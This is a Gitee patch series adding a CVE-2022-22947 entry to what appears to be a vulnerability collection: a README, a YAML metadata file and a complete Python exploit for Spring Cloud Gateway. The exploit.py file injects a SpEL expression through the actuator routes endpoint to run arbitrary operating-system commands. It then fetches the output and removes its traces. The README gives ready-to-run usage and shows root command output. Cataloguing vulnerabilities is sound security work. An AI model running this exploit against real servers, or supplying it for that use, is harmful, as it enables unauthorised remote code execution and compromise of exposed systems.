From c19cf9e484999d6384d09786e4da791b9c74c290 Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 05:56:32 +0000 Subject: [PATCH 01/17] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20java-spring-cloud-ga?= =?UTF-8?q?teway?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring-cloud-gateway/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/java-spring-cloud-gateway/.keep diff --git a/cve/java-spring-cloud-gateway/.keep b/cve/java-spring-cloud-gateway/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 3f5d6b75009eedf4ce4024f8e138a759a1eef510 Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 05:57:12 +0000 Subject: [PATCH 02/17] =?UTF-8?q?=E6=96=B0=E5=BB=BA=202022?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring-cloud-gateway/2022/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/java-spring-cloud-gateway/2022/.keep diff --git a/cve/java-spring-cloud-gateway/2022/.keep b/cve/java-spring-cloud-gateway/2022/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 4eef8f96e0635123f6609dbd8e85459ed8a1c7cf Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 05:58:00 +0000 Subject: [PATCH 03/17] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2022-22947?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring-cloud-gateway/2022/CVE-2022-22947/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/java-spring-cloud-gateway/2022/CVE-2022-22947/.keep diff --git a/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/.keep b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 69ee7e958f9b56649079ae8b76736f2b9ef5a0bb Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 05:59:45 +0000 Subject: [PATCH 04/17] =?UTF-8?q?=E4=B8=8A=E4=BC=A0poc?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: zxengweihao --- .../2022/CVE-2022-22947/README.md | 44 +++++++++++ .../2022/CVE-2022-22947/exploit.py | 76 +++++++++++++++++++ .../2022/CVE-2022-22947/requirements.txt | 5 ++ 3 files changed, 125 insertions(+) create mode 100644 cve/java-spring-cloud-gateway/2022/CVE-2022-22947/README.md create mode 100644 cve/java-spring-cloud-gateway/2022/CVE-2022-22947/exploit.py create mode 100644 cve/java-spring-cloud-gateway/2022/CVE-2022-22947/requirements.txt diff --git a/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/README.md b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/README.md new file mode 100644 index 00000000..d744b0b8 --- /dev/null +++ b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/README.md @@ -0,0 +1,44 @@ +# Spring Cloud Gateway < 3.0.7 & < 3.1.1 Code Injection (RCE) +###### CVE: CVE-2022-22947 +###### CVSS: 10.0 (Vmware - https://tanzu.vmware.com/security/cve-2022-22947) +###### Applications using Spring Cloud Gateway are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host. + + +#### Usage +```sh +git clone https://github.com/carlosevieira/CVE-2022-22947 +cd CVE-2022-22947 +pip3 install -r requirements.txt +python3 exploit.py http://target 'id' +``` + +```sh +john@doe:~/exploit/CVE-2022-22947/$ python3 exploit.py http://localhost:8080 'id' + + ################################################### + # # + # Exploit for CVE-2022-22947 # + # - Carlos Vieira (Crowsec) # + # # + # Usage: # + # python3 exploit.py # + # # + # Example: # + # python3 exploit.py http://localhost:8080 'id' # + # # + ################################################### + +[+] Stage deployed to /actuator/gateway/routes/rtxhovup +[+] Executing command... +[+] getting result... +[+] Stage removed! +uid=0(root) gid=0(root) groups=0(root) +``` + +#### References + +https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/ + +https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published + +https://tanzu.vmware.com/security/cve-2022-22947 \ No newline at end of file diff --git a/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/exploit.py b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/exploit.py new file mode 100644 index 00000000..953f4759 --- /dev/null +++ b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/exploit.py @@ -0,0 +1,76 @@ +import random +import string +import requests +import json +import sys +import urllib.parse +import base64 +import urllib3 +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +headers = { "Content-Type": "application/json" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'} + +id = ''.join(random.choice(string.ascii_lowercase) for i in range(8)) + +def exploit(url, command): + + payload = { "id": id, "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022"+command+"\u0022).getInputStream()))}"}}],"uri": "http://example.com"} + + rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), verify=False) + if(rbase.status_code == 201): + print("[+] Stage deployed to /actuator/gateway/routes/"+id) + print("[+] Executing command...") + r = requests.post(url + '/actuator/gateway/refresh', headers=headers, verify=False) + if(r.status_code == 200): + print("[+] getting result...") + r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False) + if(r.status_code == 200): + get_response = r.json() + clean(url, id) + return get_response['filters'][0].split("'")[1] + else: + print("[-] Error: Invalid response") + clean(url, id) + exit(1) + else: + clean(url, id) + print("[-] Error executing command") + else: + print("[X] Error: Fail to deploy stage (Patched ?)") + exit(1) + +def clean(url, id): + remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False) + if(remove.status_code == 200): + print("[+] Stage removed!") + else: + print("[-] Error: Fail to remove stage") + +def banner(): + print(""" + ################################################### + # # + # Exploit for CVE-2022-22947 # + # - Carlos Vieira (Crowsec) # + # # + # Usage: # + # python3 exploit.py # + # # + # Example: # + # python3 exploit.py http://localhost:8080 'id' # + # # + ################################################### + """) + +def main(): + banner() + if len(sys.argv) != 3: + print("[-] Error: Invalid arguments") + print("[-] Usage: python3 exploit.py ") + exit(1) + else: + url = sys.argv[1] + command = sys.argv[2] + print(exploit(url, command)) +if __name__ == '__main__': + main() \ No newline at end of file diff --git a/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/requirements.txt b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/requirements.txt new file mode 100644 index 00000000..e4f9df0f --- /dev/null +++ b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/requirements.txt @@ -0,0 +1,5 @@ +certifi==2021.10.8 +charset-normalizer==2.0.12 +idna==3.3 +requests==2.27.1 +urllib3==1.26.8 -- Gitee From c5109725fea514c8e3d8ef956860d295f4d11434 Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 05:59:56 +0000 Subject: [PATCH 05/17] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/java-spring-cloud-gateway/2022/CVE-2022-22947/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring-cloud-gateway/2022/CVE-2022-22947/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/java-spring-cloud-gateway/2022/CVE-2022-22947/.keep diff --git a/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/.keep b/cve/java-spring-cloud-gateway/2022/CVE-2022-22947/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 2baddec8b6fd2cd6144bdc83186af59739ecc0aa Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 06:00:13 +0000 Subject: [PATCH 06/17] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/java-spring-cloud-gateway/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring-cloud-gateway/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/java-spring-cloud-gateway/.keep diff --git a/cve/java-spring-cloud-gateway/.keep b/cve/java-spring-cloud-gateway/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 2b894ac3b72935d0718890f1b754f5f90708c584 Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 06:01:27 +0000 Subject: [PATCH 07/17] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/java-spring-cloud-gateway/2022/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring-cloud-gateway/2022/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/java-spring-cloud-gateway/2022/.keep diff --git a/cve/java-spring-cloud-gateway/2022/.keep b/cve/java-spring-cloud-gateway/2022/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From 8bafc3eba4689bd0c09b14ef3aafdb4a7fef9027 Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 06:02:03 +0000 Subject: [PATCH 08/17] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring-cloud-gateway/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/java-spring-cloud-gateway/2022/yaml/.keep diff --git a/cve/java-spring-cloud-gateway/2022/yaml/.keep b/cve/java-spring-cloud-gateway/2022/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 17b070abf6f955fda2058ea0cc229232cee34977 Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 06:02:08 +0000 Subject: [PATCH 09/17] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/java-spring-cloud-gateway/2022/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring-cloud-gateway/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/java-spring-cloud-gateway/2022/yaml/.keep diff --git a/cve/java-spring-cloud-gateway/2022/yaml/.keep b/cve/java-spring-cloud-gateway/2022/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From f380303e345acf93cbee619669366ff6324cf5c9 Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 06:14:29 +0000 Subject: [PATCH 10/17] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring-cloud-gateway/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/java-spring-cloud-gateway/2022/yaml/.keep diff --git a/cve/java-spring-cloud-gateway/2022/yaml/.keep b/cve/java-spring-cloud-gateway/2022/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From a9d53cdbe79bc1708e59275f2c74eea793cef495 Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 06:14:45 +0000 Subject: [PATCH 11/17] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/java-spring-cloud-gateway/2022/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring-cloud-gateway/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/java-spring-cloud-gateway/2022/yaml/.keep diff --git a/cve/java-spring-cloud-gateway/2022/yaml/.keep b/cve/java-spring-cloud-gateway/2022/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From aa58c95d5fe7e3dc8fbe88421954b453191bca76 Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 06:15:07 +0000 Subject: [PATCH 12/17] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring-cloud-gateway/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/java-spring-cloud-gateway/2022/yaml/.keep diff --git a/cve/java-spring-cloud-gateway/2022/yaml/.keep b/cve/java-spring-cloud-gateway/2022/yaml/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 6a1dfa57220af8aeabf0fef09ad552c668c0b935 Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 06:15:28 +0000 Subject: [PATCH 13/17] =?UTF-8?q?=E6=8F=90=E4=BA=A4yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: zxengweihao --- .../2022/yaml/CVE-2022-22947.yaml | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml diff --git a/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml b/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml new file mode 100644 index 00000000..97cd25a8 --- /dev/null +++ b/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml @@ -0,0 +1,21 @@ +id: CVE-2022-22947 +source: https://github.com/crowsec-edtech/CVE-2022-22947 +info: + name: Spring Cloud Gateway 是 Spring Cloud 的一个全新项目,该项目是基于 Spring 5.0,Spring Boot 2.0 和 Project Reactor 等技术开发的网关,它旨在为微服务架构提供一种简单有效的统一的 API 路由管理方式。 + severity: critical + description: | + Spring Cloud Gateway存在远程代码执行漏洞,该漏洞是发生在Spring Cloud Gateway应用程序的Actuator端点,其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可利用该漏洞通过恶意创建允许在远程主机上执行任意远程请求。 + scope-of-influence: + Spring Cloud GateWay 3.1.0 + Spring Cloud GateWay >=3.0.0, <=3.0.6 + Spring Cloud GateWay <3.0.0 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-22947 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H + cvss-score: 10.0 + cve-id: CVE-2022-22947 + cwe-id: CWE-94 + cnvd-id: CNNVD-2022-16402 + kve-id: None + tags: cve2022,spring-cloud-gateway \ No newline at end of file -- Gitee From 940836aee8314ec582b291e0f66c6fda9237e76e Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 06:15:34 +0000 Subject: [PATCH 14/17] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cv?= =?UTF-8?q?e/java-spring-cloud-gateway/2022/yaml/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/java-spring-cloud-gateway/2022/yaml/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/java-spring-cloud-gateway/2022/yaml/.keep diff --git a/cve/java-spring-cloud-gateway/2022/yaml/.keep b/cve/java-spring-cloud-gateway/2022/yaml/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From f999f3b64e1e05a0c2f7282c4d203c0867ce9615 Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 06:21:14 +0000 Subject: [PATCH 15/17] update other_list.yaml. Signed-off-by: zxengweihao --- other_list.yaml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/other_list.yaml b/other_list.yaml index 9584b359..07ab1f7a 100644 --- a/other_list.yaml +++ b/other_list.yaml @@ -19,4 +19,6 @@ cve: - CVE-2021-44142 nvidia: - CVE-2021-1056 + java-spring-cloud-gateway: + - CVE-2022-22947 cnvd: \ No newline at end of file -- Gitee From 0d536f3bd2e16e2b5ad5a8d53e55e5a91b22adaa Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 06:23:53 +0000 Subject: [PATCH 16/17] update cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml. Signed-off-by: zxengweihao --- cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml b/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml index 97cd25a8..6d06fcac 100644 --- a/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml +++ b/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml @@ -1,5 +1,6 @@ id: CVE-2022-22947 -source: https://github.com/crowsec-edtech/CVE-2022-22947 +source: + https://github.com/crowsec-edtech/CVE-2022-22947 info: name: Spring Cloud Gateway 是 Spring Cloud 的一个全新项目,该项目是基于 Spring 5.0,Spring Boot 2.0 和 Project Reactor 等技术开发的网关,它旨在为微服务架构提供一种简单有效的统一的 API 路由管理方式。 severity: critical -- Gitee From 47e411aa16cbfe52c4473f3e95a4158c8307fde0 Mon Sep 17 00:00:00 2001 From: zxengweihao Date: Thu, 16 Mar 2023 07:03:08 +0000 Subject: [PATCH 17/17] update cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml. Signed-off-by: zxengweihao --- cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml b/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml index 6d06fcac..21923f43 100644 --- a/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml +++ b/cve/java-spring-cloud-gateway/2022/yaml/CVE-2022-22947.yaml @@ -17,6 +17,6 @@ info: cvss-score: 10.0 cve-id: CVE-2022-22947 cwe-id: CWE-94 - cnvd-id: CNNVD-2022-16402 + cnvd-id: None kve-id: None - tags: cve2022,spring-cloud-gateway \ No newline at end of file + tags: cve2022, spring-cloud-gateway \ No newline at end of file -- Gitee